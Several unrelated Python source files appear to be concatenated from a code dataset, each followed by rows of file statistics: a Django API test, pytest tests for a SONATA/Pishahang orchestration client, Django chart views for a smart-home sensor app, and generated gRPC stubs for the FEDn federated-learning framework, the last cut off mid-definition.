            username='testuser1', password='1X<ISRUkw+tuK')
        newgroup = Group.objects.create(name='testgroup')
        for each in Permission.objects.all():
            newgroup.permissions.add(each)
        cls.test_user1.groups.add(newgroup)
        test_user1_userprofile = UserProfile.objects.create(
            user=cls.test_user1,
            name='Test User1',
            telephone='11',
            email='testuser1@email.com',
            employee_id='2',
            departament='sal',
            location='WAW'
        )
        test_user1_userprofile.save()
        cls.factory = APIRequestFactory()
        test_board_category1 = BoardCategory.objects.create(
            title='test title 1'
        )
        test_board_category2 = BoardCategory.objects.create(
            title='test title 2'
        )

    def test_queryset(self):
        user = self.test_user1
        token = get_token(user)
        request = self.factory.get(
            '/suggestions/api/',
            HTTP_AUTHORIZATION='JWT ' + token)
        view = BoardCategoryListAPIView.as_view()
        response = view(request)
        response.render()
        self.assertEquals(len(json.loads(response.content)), 2)
| 31.344937 | 100 | 0.597375 | 1,039 | 9,905 | 5.538017 | 0.111646 | 0.064129 | 0.047967 | 0.034411 | 0.862704 | 0.847932 | 0.802225 | 0.791623 | 0.791623 | 0.786931 | 0 | 0.020818 | 0.301666 | 9,905 | 315 | 101 | 31.444444 | 0.811045 | 0.003534 | 0 | 0.74717 | 0 | 0 | 0.092724 | 0.013579 | 0 | 0 | 0 | 0 | 0.037736 | 1 | 0.041509 | false | 0.015094 | 0.037736 | 0 | 0.098113 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0702149b84c33aec2f35646ecdc185d7f0d3eb39 | 5,854 | py | Python | tests/sonata/test_pishahang.py | CN-UPB/python-mano-wrappers | 8e3607feaa97bc3e2c906ee8e4b25b21853ea6cf | [
"Apache-2.0"
] | null | null | null | tests/sonata/test_pishahang.py | CN-UPB/python-mano-wrappers | 8e3607feaa97bc3e2c906ee8e4b25b21853ea6cf | [
"Apache-2.0"
] | null | null | null | tests/sonata/test_pishahang.py | CN-UPB/python-mano-wrappers | 8e3607feaa97bc3e2c906ee8e4b25b21853ea6cf | [
"Apache-2.0"
] | null | null | null | from wrappers import SONATAClient
from pytest import fixture
from .sonata_fixture import *
from .config import *
import json
import time
from .helpers import Helpers
def test_get_csd_descriptors(get_csd_descriptors_keys):
    """Tests API call to fetch multiple CS descriptor (CSD) resources"""
    sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
    sonata_auth = SONATAClient.Auth(HOST_URL)
    _token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
    _token = json.loads(_token["data"])
    response = json.loads(sonata_pishahang.get_csd_descriptors(
        token=_token["token"]["access_token"], limit=1000))
    response = json.loads(response["data"])
    assert isinstance(response, list)
    if len(response) > 0:
        assert set(get_csd_descriptors_keys).issubset(
            response[0].keys()), "All keys should be in the response"


def test_post_csd_descriptors(post_csd_descriptors_keys):
    """Tests API call to onboard CS descriptor (CSD) resources"""
    sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
    sonata_auth = SONATAClient.Auth(HOST_URL)
    _token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
    _token = json.loads(_token["data"])
    Helpers._delete_test_csds(_token=_token["token"]["access_token"])
    response = json.loads(sonata_pishahang.post_csd_descriptors(
        token=_token["token"]["access_token"],
        package_path="tests/samples/csd_example.yml"))
    print(response)
    assert response['error'] == False
    assert response['data'] != ''


def test_post_cosd_descriptors(post_cosd_descriptors_keys):
    """Tests API call to onboard COSD resources"""
    sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
    sonata_auth = SONATAClient.Auth(HOST_URL)
    _token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
    _token = json.loads(_token["data"])
    Helpers._delete_test_cosds(_token=_token["token"]["access_token"])
    response = json.loads(sonata_pishahang.post_cosd_descriptors(
        token=_token["token"]["access_token"],
        package_path="tests/samples/cosd_example.yml"))
    assert response['error'] == False
    assert response['data'] != ''


def test_get_cosd_descriptors(get_cosd_descriptors_keys):
    """Tests API call to fetch multiple COSD resources"""
    sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
    sonata_auth = SONATAClient.Auth(HOST_URL)
    _token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
    _token = json.loads(_token["data"])
    response = json.loads(sonata_pishahang.get_cosd_descriptors(
        token=_token["token"]["access_token"], limit=1000))
    response = json.loads(response["data"])
    assert isinstance(response, list)
    if len(response) > 0:
        assert set(get_cosd_descriptors_keys).issubset(
            response[0].keys()), "All keys should be in the response"


def test_post_cs_instances_nsinstanceid_instantiate(post_cs_instances_nsinstanceid_instantiate_keys):
    """Tests API call to instantiate a CS"""
    sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
    sonata_auth = SONATAClient.Auth(HOST_URL)
    _token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
    _token = json.loads(_token["data"])
    _cosd_list = json.loads(sonata_pishahang.get_cosd_descriptors(token=_token["token"]["access_token"]))
    _cosd_list = json.loads(_cosd_list["data"])
    _ns = None
    for _n in _cosd_list:
        if "scramble-cosd" == _n['cosd']['name']:
            _ns = _n['uuid']
    print(_ns)
    if _ns:
        response = json.loads(
            sonata_pishahang.post_cs_instances_nsinstanceid_instantiate(
                token=_token["token"]["access_token"], nsInstanceId=_ns))
        print(response)
        assert response['error'] == False
        response = json.loads(response["data"])
        assert isinstance(response, dict)
        assert set(post_cs_instances_nsinstanceid_instantiate_keys).issubset(
            response.keys()), "All keys should be in the response"
    else:
        return False


def test_post_cs_instances_nsinstanceid_terminate(post_cs_instances_nsinstanceid_terminate_keys):
    """Tests API call to terminate a CS instance"""
    sonata_nslcm = SONATAClient.Nslcm(HOST_URL)
    sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
    sonata_auth = SONATAClient.Auth(HOST_URL)
    _token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
    _token = json.loads(_token["data"])
    _csd_list = json.loads(sonata_pishahang.get_csd_descriptors(
        token=_token["token"]["access_token"]))
    _csd_list = json.loads(_csd_list["data"])
    _ns_list = json.loads(sonata_nslcm.get_ns_instances(
        token=_token["token"]["access_token"]))
    _ns_list = json.loads(_ns_list["data"])
    _ns = None
    for _n in _csd_list:
        if "scramble-csd" == _n['csd']['name']:
            print(_n['uuid'])
            for _n2 in _ns_list:
                print(_n2)
                if _n['uuid'] == _n2['descriptor_reference']:
                    _ns = _n2['uuid']
    if _ns:
        response = json.loads(
            sonata_pishahang.post_cs_instances_nsinstanceid_terminate(
                token=_token["token"]["access_token"], nsInstanceId=_ns))
        assert response['error'] == False
        response = json.loads(response["data"])
        assert isinstance(response, dict)
        assert set(post_cs_instances_nsinstanceid_terminate_keys).issubset(
            response.keys()), "All keys should be in the response"
    else:
        return False
| 39.823129 | 105 | 0.669286 | 686 | 5,854 | 5.389213 | 0.123907 | 0.068163 | 0.06086 | 0.062483 | 0.85096 | 0.833108 | 0.783067 | 0.725453 | 0.725453 | 0.67947 | 0 | 0.003506 | 0.220533 | 5,854 | 146 | 106 | 40.09589 | 0.806706 | 0.048855 | 0 | 0.587156 | 0 | 0 | 0.097252 | 0.010665 | 0 | 0 | 0 | 0 | 0.12844 | 1 | 0.055046 | false | 0.055046 | 0.06422 | 0 | 0.137615 | 0.045872 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
0723bada5c09f2707349426e8a669be531eb2648 | 2,989 | py | Python | smarthome/src/RT_Data_Interaction/myhome/views.py | hpecl-sspku/hpecl-2017 | 895757eb7d5f984e0268ab99da95663172bc2f50 | [
"MIT"
] | null | null | null | smarthome/src/RT_Data_Interaction/myhome/views.py | hpecl-sspku/hpecl-2017 | 895757eb7d5f984e0268ab99da95663172bc2f50 | [
"MIT"
] | 8 | 2018-03-19T03:24:56.000Z | 2018-07-31T15:25:25.000Z | smarthome/src/RT_Data_Interaction/myhome/views.py | hpecl-sspku/hpecl-2017 | 895757eb7d5f984e0268ab99da95663172bc2f50 | [
"MIT"
] | 3 | 2018-11-13T06:46:51.000Z | 2020-07-20T05:53:56.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from django.shortcuts import render
from django.http import HttpResponse
from . import models
# Create your views here.
def index(request):
    nodedata = models.Nodedata.objects.order_by('-id')[0]
    commands = models.Commands.objects.get(pk=1)
    return render(request, 'myhome/index.html', {'commands': commands, 'nodedata': nodedata})
    # return render(request, 'myhome/index.html', {'commands': commands, 'nodedata': nodedata.toJSON})


def bar1(request):
    nodedatas = models.Nodedata.objects.all()
    listx = []
    listy = []
    datetmp = '0'
    flag = 0
    for nodedata in nodedatas[::-1]:
        date = str(nodedata.time)[0:10]
        if datetmp == date:
            pass
        else:
            datetmp = date
            flag = flag + 1
            if flag == 8:
                break
            else:
                listx.append(str(date))
                listy.append(float(nodedata.temperature))
    listx = listx[::-1]
    listy = listy[::-1]
    return render(request, 'myhome/bar1.html', {'nodedatas': nodedatas, 'X': listx, 'Y': listy})


def bar2(request):
    nodedatas = models.Nodedata.objects.all()
    listx = []
    listy = []
    datetmp = '0'
    flag = 0
    for nodedata in nodedatas[::-1]:
        date = str(nodedata.time)[0:10]
        if datetmp == date:
            pass
        else:
            datetmp = date
            flag = flag + 1
            if flag == 8:
                break
            else:
                listx.append(str(date))
                listy.append(float(nodedata.humidity))
    listx = listx[::-1]
    listy = listy[::-1]
    return render(request, 'myhome/bar2.html', {'nodedatas': nodedatas, 'X': listx, 'Y': listy})


def bar3(request):
    nodedatas = models.Nodedata.objects.all()
    listx = []
    listy = []
    datetmp = '0'
    flag = 0
    for nodedata in nodedatas[::-1]:
        date = str(nodedata.time)[0:10]
        if datetmp == date:
            pass
        else:
            datetmp = date
            flag = flag + 1
            if flag == 8:
                break
            else:
                listx.append(str(date))
                listy.append(float(nodedata.light))
    listx = listx[::-1]
    listy = listy[::-1]
    return render(request, 'myhome/bar3.html', {'nodedatas': nodedatas, 'X': listx, 'Y': listy})


def bar4(request):
    nodedatas = models.Nodedata.objects.all()
    listx = []
    listy = []
    datetmp = '0'
    flag = 0
    for nodedata in nodedatas[::-1]:
        date = str(nodedata.time)[0:10]
        if datetmp == date:
            pass
        else:
            datetmp = date
            flag = flag + 1
            if flag == 8:
                break
            else:
                listx.append(str(date))
                listy.append(float(nodedata.co2_simulation))
    listx = listx[::-1]
    listy = listy[::-1]
    return render(request, 'myhome/bar4.html', {'nodedatas': nodedatas, 'X': listx, 'Y': listy})


def bar5(request):
    nodedatas = models.Nodedata.objects.all()
    listx = []
    listy = []
    datetmp = '0'
    flag = 0
    for nodedata in nodedatas[::-1]:
        date = str(nodedata.time)[0:10]
        if datetmp == date:
            pass
        else:
            datetmp = date
            flag = flag + 1
            if flag == 8:
                break
            else:
                listx.append(str(date))
                listy.append(float(nodedata.noise))
    listx = listx[::-1]
    listy = listy[::-1]
    return render(request, 'myhome/bar5.html', {'nodedatas': nodedatas, 'X': listx, 'Y': listy})
| 23.535433 | 98 | 0.642355 | 402 | 2,989 | 4.758706 | 0.166667 | 0.057501 | 0.069524 | 0.091479 | 0.828542 | 0.828019 | 0.828019 | 0.810246 | 0.73288 | 0.73288 | 0 | 0.026381 | 0.188357 | 2,989 | 126 | 99 | 23.722222 | 0.76216 | 0.047508 | 0 | 0.789474 | 0 | 0 | 0.061906 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0.04386 | 0.04386 | 0 | 0.149123 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
072493cc577da615c68ada624442a3f6b7c05920 | 53,559 | py | Python | fedn/fedn/common/net/grpc/fedn_pb2_grpc.py | eriks-aidotse/fedn | ab784e6ac45fd02be4532c9bbc8d5b8c75b62d51 | [
"Apache-2.0"
] | 75 | 2020-07-19T10:40:15.000Z | 2022-03-13T06:56:04.000Z | fedn/fedn/common/net/grpc/fedn_pb2_grpc.py | eriks-aidotse/fedn | ab784e6ac45fd02be4532c9bbc8d5b8c75b62d51 | [
"Apache-2.0"
] | 124 | 2020-07-27T18:16:21.000Z | 2022-03-10T12:16:04.000Z | fedn/fedn/common/net/grpc/fedn_pb2_grpc.py | eriks-aidotse/fedn | ab784e6ac45fd02be4532c9bbc8d5b8c75b62d51 | [
"Apache-2.0"
] | 28 | 2020-08-14T19:39:30.000Z | 2022-03-16T10:29:09.000Z | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from fedn.common.net.grpc import fedn_pb2 as fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2
class ModelServiceStub(object):
    """Missing associated documentation comment in .proto file."""

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        self.Upload = channel.stream_unary(
            '/grpc.ModelService/Upload',
            request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelRequest.SerializeToString,
            response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelResponse.FromString,
        )
        self.Download = channel.unary_stream(
            '/grpc.ModelService/Download',
            request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelRequest.SerializeToString,
            response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelResponse.FromString,
        )


class ModelServiceServicer(object):
    """Missing associated documentation comment in .proto file."""

    def Upload(self, request_iterator, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Download(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')


def add_ModelServiceServicer_to_server(servicer, server):
    """
    :param servicer:
    :param server:
    """
    rpc_method_handlers = {
        'Upload': grpc.stream_unary_rpc_method_handler(
            servicer.Upload,
            request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelRequest.FromString,
            response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelResponse.SerializeToString,
        ),
        'Download': grpc.unary_stream_rpc_method_handler(
            servicer.Download,
            request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelRequest.FromString,
            response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelResponse.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'grpc.ModelService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))


# This class is part of an EXPERIMENTAL API.
class ModelService(object):
    """Missing associated documentation comment in .proto file."""

    @staticmethod
    def Upload(request_iterator,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """
        :param request_iterator:
        :param target:
        :param options:
        :param channel_credentials:
        :param call_credentials:
        :param insecure:
        :param compression:
        :param wait_for_ready:
        :param timeout:
        :param metadata:
        :return:
        """
        return grpc.experimental.stream_unary(request_iterator, target, '/grpc.ModelService/Upload',
            fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelRequest.SerializeToString,
            fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout,
            metadata)

    @staticmethod
    def Download(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """
        :param request:
        :param target:
        :param options:
        :param channel_credentials:
        :param call_credentials:
        :param insecure:
        :param compression:
        :param wait_for_ready:
        :param timeout:
        :param metadata:
        :return:
        """
        return grpc.experimental.unary_stream(request, target, '/grpc.ModelService/Download',
            fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelRequest.SerializeToString,
            fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout,
            metadata)


class ControlStub(object):
    """Missing associated documentation comment in .proto file."""

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        self.Start = channel.unary_unary(
            '/grpc.Control/Start',
            request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
            response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlResponse.FromString,
        )
        self.Stop = channel.unary_unary(
            '/grpc.Control/Stop',
            request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
            response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlResponse.FromString,
        )
        self.Configure = channel.unary_unary(
            '/grpc.Control/Configure',
            request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
            response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReportResponse.FromString,
        )
        self.Report = channel.unary_unary(
            '/grpc.Control/Report',
            request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
            response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReportResponse.FromString,
        )


class ControlServicer(object):
    """Missing associated documentation comment in .proto file."""

    def Start(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Stop(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Configure(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Report(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')


def add_ControlServicer_to_server(servicer, server):
    """
    :param servicer:
    :param server:
    """
    rpc_method_handlers = {
        'Start': grpc.unary_unary_rpc_method_handler(
            servicer.Start,
            request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.FromString,
            response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlResponse.SerializeToString,
        ),
        'Stop': grpc.unary_unary_rpc_method_handler(
            servicer.Stop,
            request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.FromString,
            response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlResponse.SerializeToString,
        ),
        'Configure': grpc.unary_unary_rpc_method_handler(
            servicer.Configure,
            request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.FromString,
            response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReportResponse.SerializeToString,
        ),
        'Report': grpc.unary_unary_rpc_method_handler(
            servicer.Report,
            request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.FromString,
            response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReportResponse.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'grpc.Control', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))


# This class is part of an EXPERIMENTAL API.
class Control(object):
    """Missing associated documentation comment in .proto file."""

    @staticmethod
    def Start(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """
        :param request:
        :param target:
        :param options:
        :param channel_credentials:
        :param call_credentials:
        :param insecure:
        :param compression:
        :param wait_for_ready:
        :param timeout:
        :param metadata:
        :return:
        """
        return grpc.experimental.unary_unary(request, target, '/grpc.Control/Start',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Stop(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Control/Stop',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Configure(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Control/Configure',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReportResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Report(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Control/Report',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReportResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
class ReducerStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetGlobalModel = channel.unary_unary(
'/grpc.Reducer/GetGlobalModel',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.GetGlobalModelRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.GetGlobalModelResponse.FromString,
)
class ReducerServicer(object):
"""Missing associated documentation comment in .proto file."""
def GetGlobalModel(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ReducerServicer_to_server(servicer, server):
"""
:param servicer:
:param server:
"""
rpc_method_handlers = {
'GetGlobalModel': grpc.unary_unary_rpc_method_handler(
servicer.GetGlobalModel,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.GetGlobalModelRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.GetGlobalModelResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'grpc.Reducer', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Reducer(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def GetGlobalModel(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Reducer/GetGlobalModel',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.GetGlobalModelRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.GetGlobalModelResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
class ConnectorStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.AllianceStatusStream = channel.unary_stream(
'/grpc.Connector/AllianceStatusStream',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Status.FromString,
)
self.SendStatus = channel.unary_unary(
'/grpc.Connector/SendStatus',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Status.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
self.ListActiveClients = channel.unary_unary(
'/grpc.Connector/ListActiveClients',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ListClientsRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientList.FromString,
)
self.AcceptingClients = channel.unary_unary(
'/grpc.Connector/AcceptingClients',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ConnectionRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ConnectionResponse.FromString,
)
self.SendHeartbeat = channel.unary_unary(
'/grpc.Connector/SendHeartbeat',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Heartbeat.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
self.ReassignClient = channel.unary_unary(
'/grpc.Connector/ReassignClient',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReassignRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
self.ReconnectClient = channel.unary_unary(
'/grpc.Connector/ReconnectClient',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReconnectRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
class ConnectorServicer(object):
"""Missing associated documentation comment in .proto file."""
def AllianceStatusStream(self, request, context):
"""Stream endpoint for status updates
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SendStatus(self, request, context):
"""Report endpoint
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListActiveClients(self, request, context):
"""rpc RegisterClient (ClientAvailableMessage) returns (Response);
List active clients endpoint
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def AcceptingClients(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SendHeartbeat(self, request, context):
"""Client messaging to stay engaged.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ReassignClient(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ReconnectClient(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ConnectorServicer_to_server(servicer, server):
"""
:param servicer:
:param server:
"""
rpc_method_handlers = {
'AllianceStatusStream': grpc.unary_stream_rpc_method_handler(
servicer.AllianceStatusStream,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Status.SerializeToString,
),
'SendStatus': grpc.unary_unary_rpc_method_handler(
servicer.SendStatus,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Status.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
'ListActiveClients': grpc.unary_unary_rpc_method_handler(
servicer.ListActiveClients,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ListClientsRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientList.SerializeToString,
),
'AcceptingClients': grpc.unary_unary_rpc_method_handler(
servicer.AcceptingClients,
